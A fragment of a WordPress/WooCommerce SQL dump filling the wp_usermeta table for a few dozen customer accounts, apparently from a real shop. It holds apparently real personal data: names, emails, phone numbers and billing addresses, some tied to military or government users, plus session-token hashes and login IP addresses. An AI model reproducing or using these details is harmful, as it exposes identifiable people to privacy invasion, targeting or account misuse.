INSERT INTO `wp_usermeta` VALUES (7954, 476, 'billing_city', 'Oak Grove'); 
INSERT INTO `wp_usermeta` VALUES (7955, 476, 'billing_state', 'MN'); 
INSERT INTO `wp_usermeta` VALUES (7956, 476, 'billing_postcode', '55011'); 
INSERT INTO `wp_usermeta` VALUES (7957, 476, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7958, 477, 'nickname', 'ADAM.J.MONTGOMERY11.MIL'); 
INSERT INTO `wp_usermeta` VALUES (7959, 477, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7960, 477, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7961, 477, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7962, 477, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7963, 477, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7964, 477, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7965, 477, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7966, 477, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7967, 477, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7968, 477, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7969, 477, '_yoast_wpseo_profile_updated', '1487776713'); 
INSERT INTO `wp_usermeta` VALUES (7970, 477, 'session_tokens', 'a:1:{s:64:"45ee74f66865c6404d170743aaaa14b3969bb0fc357c0b55de66bb4a0efaf912";a:4:{s:10:"expiration";i:1488986314;s:2:"ip";s:12:"131.43.10.30";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487776714;}}'); 
INSERT INTO `wp_usermeta` VALUES (7971, 478, 'nickname', 'jlmurray'); 
INSERT INTO `wp_usermeta` VALUES (7972, 478, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7973, 478, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7974, 478, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7975, 478, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7976, 478, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7977, 478, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7978, 478, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7979, 478, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7980, 478, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7981, 478, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7982, 478, '_yoast_wpseo_profile_updated', '1487781050'); 
INSERT INTO `wp_usermeta` VALUES (7983, 478, 'session_tokens', 'a:1:{s:64:"ce23333bd14ee4e5e24dd43244cb10c09f12734795fc83db29d28e1ae2a54a3f";a:4:{s:10:"expiration";i:1493385192;s:2:"ip";s:12:"198.49.82.49";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1493212392;}}'); 
INSERT INTO `wp_usermeta` VALUES (7984, 479, 'nickname', 'rob_hooper'); 
INSERT INTO `wp_usermeta` VALUES (7985, 479, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7986, 479, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7987, 479, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7988, 479, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7989, 479, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7990, 479, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7991, 479, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7992, 479, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7993, 479, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7994, 479, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7995, 479, '_yoast_wpseo_profile_updated', '1487787069'); 
INSERT INTO `wp_usermeta` VALUES (7996, 479, 'session_tokens', 'a:1:{s:64:"57375981a33528510a5d7e0a7655f3736bffaed8007f8702327e4c51356d286e";a:4:{s:10:"expiration";i:1488996670;s:2:"ip";s:13:"74.117.212.38";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487787070;}}'); 
INSERT INTO `wp_usermeta` VALUES (7997, 480, 'nickname', 'ian.long'); 
INSERT INTO `wp_usermeta` VALUES (7998, 480, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7999, 480, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8000, 480, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8001, 480, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8002, 480, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8003, 480, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8004, 480, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8005, 480, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8006, 480, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8007, 480, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8008, 480, '_yoast_wpseo_profile_updated', '1487791655'); 
INSERT INTO `wp_usermeta` VALUES (8009, 480, 'session_tokens', 'a:1:{s:64:"f4d5a57e4aac3067ddf6c640b418d9d503ce956506b753bc5884edc9aa4b6cdc";a:4:{s:10:"expiration";i:1489001256;s:2:"ip";s:12:"138.162.0.42";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487791656;}}'); 
INSERT INTO `wp_usermeta` VALUES (8010, 481, 'nickname', 'laurashields'); 
INSERT INTO `wp_usermeta` VALUES (8011, 481, 'first_name', 'Laura'); 
INSERT INTO `wp_usermeta` VALUES (8012, 481, 'last_name', 'Shields'); 
INSERT INTO `wp_usermeta` VALUES (8013, 481, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8014, 481, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8015, 481, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8016, 481, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8017, 481, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8018, 481, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8019, 481, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8020, 481, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8021, 481, '_yoast_wpseo_profile_updated', '1487795576'); 
INSERT INTO `wp_usermeta` VALUES (8022, 481, 'session_tokens', 'a:2:{s:64:"090a921c19181699b8b1c0b54b6850c557bbaffeb8c81f85497355444e10b0ec";a:4:{s:10:"expiration";i:1489005177;s:2:"ip";s:13:"70.63.120.238";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1487795577;}s:64:"b5f158aed6c24d168474d3c1e8192a764a3d35857bdbee5adb98d344c57c2461";a:4:{s:10:"expiration";i:1489005293;s:2:"ip";s:13:"70.63.120.238";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1487795693;}}'); 
INSERT INTO `wp_usermeta` VALUES (8023, 481, 'last_update', '1487795693'); 
INSERT INTO `wp_usermeta` VALUES (8024, 482, 'nickname', 'tammyp'); 
INSERT INTO `wp_usermeta` VALUES (8025, 482, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8026, 482, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8027, 482, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8028, 482, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8029, 482, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8030, 482, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8031, 482, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8032, 482, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8033, 482, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8034, 482, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8035, 482, '_yoast_wpseo_profile_updated', '1487803227'); 
INSERT INTO `wp_usermeta` VALUES (8037, 483, 'nickname', 'thor.wilbanks'); 
INSERT INTO `wp_usermeta` VALUES (8038, 483, 'first_name', 'Thor'); 
INSERT INTO `wp_usermeta` VALUES (8039, 483, 'last_name', 'Wilbanks'); 
INSERT INTO `wp_usermeta` VALUES (8040, 483, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8041, 483, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8042, 483, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8043, 483, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8044, 483, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8045, 483, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8046, 483, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8047, 483, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8048, 483, '_yoast_wpseo_profile_updated', '1487806535'); 
INSERT INTO `wp_usermeta` VALUES (8049, 483, 'session_tokens', 'a:1:{s:64:"b4e0f5ecc8f224710736831290983ec0812cf9ec9d78ad055df208225f9d7ef2";a:4:{s:10:"expiration";i:1489016136;s:2:"ip";s:14:"104.129.192.70";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1487806536;}}'); 
INSERT INTO `wp_usermeta` VALUES (8050, 483, 'last_update', '1487806575'); 
INSERT INTO `wp_usermeta` VALUES (8051, 484, 'nickname', 'harry.jarrell.ctr'); 
INSERT INTO `wp_usermeta` VALUES (8052, 484, 'first_name', 'Harry'); 
INSERT INTO `wp_usermeta` VALUES (8053, 484, 'last_name', 'Jarrell'); 
INSERT INTO `wp_usermeta` VALUES (8054, 484, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8055, 484, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8056, 484, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8057, 484, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8058, 484, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8059, 484, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8060, 484, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8061, 484, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8062, 484, '_yoast_wpseo_profile_updated', '1487853994'); 
INSERT INTO `wp_usermeta` VALUES (8063, 484, 'session_tokens', 'a:1:{s:64:"ee30d3a806efdeef2f9a854b2e73a1e23fadfe545b7e4f984089285b8478284f";a:4:{s:10:"expiration";i:1489063595;s:2:"ip";s:12:"138.162.8.57";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487853995;}}'); 
INSERT INTO `wp_usermeta` VALUES (8064, 484, 'last_update', '1487854460'); 
INSERT INTO `wp_usermeta` VALUES (8065, 485, 'nickname', 'kimberlyn.plumb'); 
INSERT INTO `wp_usermeta` VALUES (8066, 485, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8067, 485, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8068, 485, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8069, 485, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8070, 485, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8071, 485, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8072, 485, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8073, 485, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8074, 485, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8075, 485, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8076, 485, '_yoast_wpseo_profile_updated', '1487864800'); 
INSERT INTO `wp_usermeta` VALUES (8077, 485, 'session_tokens', 'a:1:{s:64:"3835c2c5c060405be6e79568b20d11b398365920e7a3cb5ea06dfad036d59fb5";a:4:{s:10:"expiration";i:1489074401;s:2:"ip";s:13:"165.225.34.74";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487864801;}}'); 
INSERT INTO `wp_usermeta` VALUES (8078, 486, 'nickname', 'bps3'); 
INSERT INTO `wp_usermeta` VALUES (8079, 486, 'first_name', 'Jeff'); 
INSERT INTO `wp_usermeta` VALUES (8080, 486, 'last_name', 'Smith'); 
INSERT INTO `wp_usermeta` VALUES (8081, 486, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8082, 486, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8083, 486, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8084, 486, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8085, 486, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8086, 486, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8087, 486, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8088, 486, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8089, 486, '_yoast_wpseo_profile_updated', '1487866983'); 
INSERT INTO `wp_usermeta` VALUES (8090, 486, 'session_tokens', 'a:1:{s:64:"98ae6a715f793fd4ed39bdd54a2c8acc277e9672d295987a8f582833967358a6";a:4:{s:10:"expiration";i:1489076584;s:2:"ip";s:14:"114.143.201.42";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487866984;}}'); 
INSERT INTO `wp_usermeta` VALUES (8091, 486, 'last_update', '1487867024'); 
INSERT INTO `wp_usermeta` VALUES (8092, 487, 'nickname', 'rhlewis'); 
INSERT INTO `wp_usermeta` VALUES (8093, 487, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8094, 487, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8095, 487, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8096, 487, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8097, 487, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8098, 487, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8099, 487, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8100, 487, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8101, 487, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8102, 487, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8103, 487, '_yoast_wpseo_profile_updated', '1487871546'); 
INSERT INTO `wp_usermeta` VALUES (8104, 487, 'session_tokens', 'a:1:{s:64:"05c94221ee1a0556476fa9baf403551b0f0f29bb1b05a2ddd7cd92e229da3f93";a:4:{s:10:"expiration";i:1489081148;s:2:"ip";s:14:"131.225.96.213";s:2:"ua";s:82:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1487871548;}}'); 
INSERT INTO `wp_usermeta` VALUES (8105, 487, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8106, 488, 'nickname', 'pel'); 
INSERT INTO `wp_usermeta` VALUES (8107, 488, 'first_name', 'Pamela'); 
INSERT INTO `wp_usermeta` VALUES (8108, 488, 'last_name', 'Larivee'); 
INSERT INTO `wp_usermeta` VALUES (8109, 488, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8110, 488, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8111, 488, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8112, 488, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8113, 488, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8114, 488, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8115, 488, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8116, 488, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8117, 488, '_yoast_wpseo_profile_updated', '1487884319'); 
INSERT INTO `wp_usermeta` VALUES (8118, 488, 'session_tokens', 'a:1:{s:64:"553f1225903c712652ed8fd616b4a43286053792ed94b24275ce7434a5f1f58e";a:4:{s:10:"expiration";i:1492862465;s:2:"ip";s:12:"96.81.115.81";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492689665;}}'); 
INSERT INTO `wp_usermeta` VALUES (8119, 488, 'billing_first_name', 'Pamela'); 
INSERT INTO `wp_usermeta` VALUES (8120, 488, 'billing_last_name', 'Larivee'); 
INSERT INTO `wp_usermeta` VALUES (8121, 488, 'billing_company', 'Dirats Laboratories'); 
INSERT INTO `wp_usermeta` VALUES (8122, 488, 'billing_email', 'pel@diratslabs.com'); 
INSERT INTO `wp_usermeta` VALUES (8123, 488, 'billing_phone', '413-568-1571'); 
INSERT INTO `wp_usermeta` VALUES (8124, 488, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (8125, 488, 'billing_address_1', '41 Airport Rd.'); 
INSERT INTO `wp_usermeta` VALUES (8126, 488, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (8127, 488, 'billing_city', 'Westfield'); 
INSERT INTO `wp_usermeta` VALUES (8128, 488, 'billing_state', 'MA'); 
INSERT INTO `wp_usermeta` VALUES (8129, 488, 'billing_postcode', '01085'); 
INSERT INTO `wp_usermeta` VALUES (8130, 488, 'last_update', '1487884519'); 
INSERT INTO `wp_usermeta` VALUES (8131, 489, 'nickname', 'mark.hampson'); 
INSERT INTO `wp_usermeta` VALUES (8132, 489, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8133, 489, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8134, 489, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8135, 489, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8136, 489, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8137, 489, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8138, 489, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8139, 489, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8140, 489, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8141, 489, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8142, 489, '_yoast_wpseo_profile_updated', '1487892269'); 
INSERT INTO `wp_usermeta` VALUES (8143, 489, 'session_tokens', 'a:1:{s:64:"1e7a45566c324556e80310186ef36cbd828289025c0cbdec628e91f8a7b347bb";a:4:{s:10:"expiration";i:1489101870;s:2:"ip";s:14:"192.249.47.211";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487892270;}}'); 
INSERT INTO `wp_usermeta` VALUES (8144, 488, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8145, 490, 'nickname', 'charles.glotzbach'); 
INSERT INTO `wp_usermeta` VALUES (8146, 490, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8147, 490, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8148, 490, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8149, 490, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8150, 490, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8151, 490, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8152, 490, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8153, 490, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8154, 490, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8155, 490, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8156, 490, '_yoast_wpseo_profile_updated', '1487948899'); 
INSERT INTO `wp_usermeta` VALUES (8158, 490, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8160, 491, 'nickname', 'richard.devine'); 
INSERT INTO `wp_usermeta` VALUES (8161, 491, 'first_name', 'Richard'); 
INSERT INTO `wp_usermeta` VALUES (8162, 491, 'last_name', 'Devine'); 
INSERT INTO `wp_usermeta` VALUES (8163, 491, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8164, 491, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8165, 491, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8166, 491, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8167, 491, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8168, 491, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8169, 491, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8170, 491, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8171, 491, '_yoast_wpseo_profile_updated', '1487961079'); 
INSERT INTO `wp_usermeta` VALUES (8173, 491, 'billing_first_name', 'Richard'); 
INSERT INTO `wp_usermeta` VALUES (8174, 491, 'billing_last_name', 'Devine'); 
INSERT INTO `wp_usermeta` VALUES (8175, 491, 'billing_company', 'BMPC-KAPL'); 
INSERT INTO `wp_usermeta` VALUES (8176, 491, 'billing_email', 'richard.devine@unnpp.gov'); 
INSERT INTO `wp_usermeta` VALUES (8177, 491, 'billing_phone', '518-395-7663'); 
INSERT INTO `wp_usermeta` VALUES (8178, 491, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (8179, 491, 'billing_address_1', 'P. O. Box 1072'); 
INSERT INTO `wp_usermeta` VALUES (8180, 491, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (8181, 491, 'billing_city', 'Schenectady'); 
INSERT INTO `wp_usermeta` VALUES (8182, 491, 'billing_state', 'NY'); 
INSERT INTO `wp_usermeta` VALUES (8183, 491, 'billing_postcode', '12301-1072'); 
INSERT INTO `wp_usermeta` VALUES (8184, 491, 'last_update', '1487961429'); 
INSERT INTO `wp_usermeta` VALUES (8185, 492, 'nickname', 'christina.anderson'); 
INSERT INTO `wp_usermeta` VALUES (8186, 492, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8187, 492, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8188, 492, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8189, 492, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8190, 492, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8191, 492, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8192, 492, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8193, 492, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8194, 492, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8195, 492, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8196, 492, '_yoast_wpseo_profile_updated', '1487962223'); 
INSERT INTO `wp_usermeta` VALUES (8197, 492, 'session_tokens', 'a:2:{s:64:"fa02a118890768eac2398afe77231a380119fa19a2870530f56c78e8a07363ec";a:4:{s:10:"expiration";i:1489171824;s:2:"ip";s:14:"65.240.195.196";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487962224;}s:64:"019f4748004056edacc1f970cd08d3246c89575474ca7d260f5fcde60cd7f714";a:4:{s:10:"expiration";i:1488731736;s:2:"ip";s:14:"65.240.195.199";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36";s:5:"login";i:1488558936;}}'); 
INSERT INTO `wp_usermeta` VALUES (8198, 492, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8200, 493, 'nickname', 'ronald.j.morris.mil'); 
INSERT INTO `wp_usermeta` VALUES (8201, 493, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8202, 493, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8203, 493, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8204, 493, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8205, 493, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8206, 493, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8207, 493, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8208, 493, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8209, 493, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8210, 493, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8211, 493, '_yoast_wpseo_profile_updated', '1487972058'); 
INSERT INTO `wp_usermeta` VALUES (8212, 493, 'session_tokens', 'a:1:{s:64:"b06e5f8e63ba05c57b305b373c59e58febbaca0a053165d40ff37d0445915ee1";a:4:{s:10:"expiration";i:1489181659;s:2:"ip";s:12:"132.85.254.2";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487972059;}}'); 
INSERT INTO `wp_usermeta` VALUES (8213, 494, 'nickname', 'childkm'); 
INSERT INTO `wp_usermeta` VALUES (8214, 494, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8215, 494, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8216, 494, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8217, 494, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8218, 494, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8219, 494, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8220, 494, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8221, 494, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8222, 494, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8223, 494, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8224, 494, '_yoast_wpseo_profile_updated', '1487975117'); 
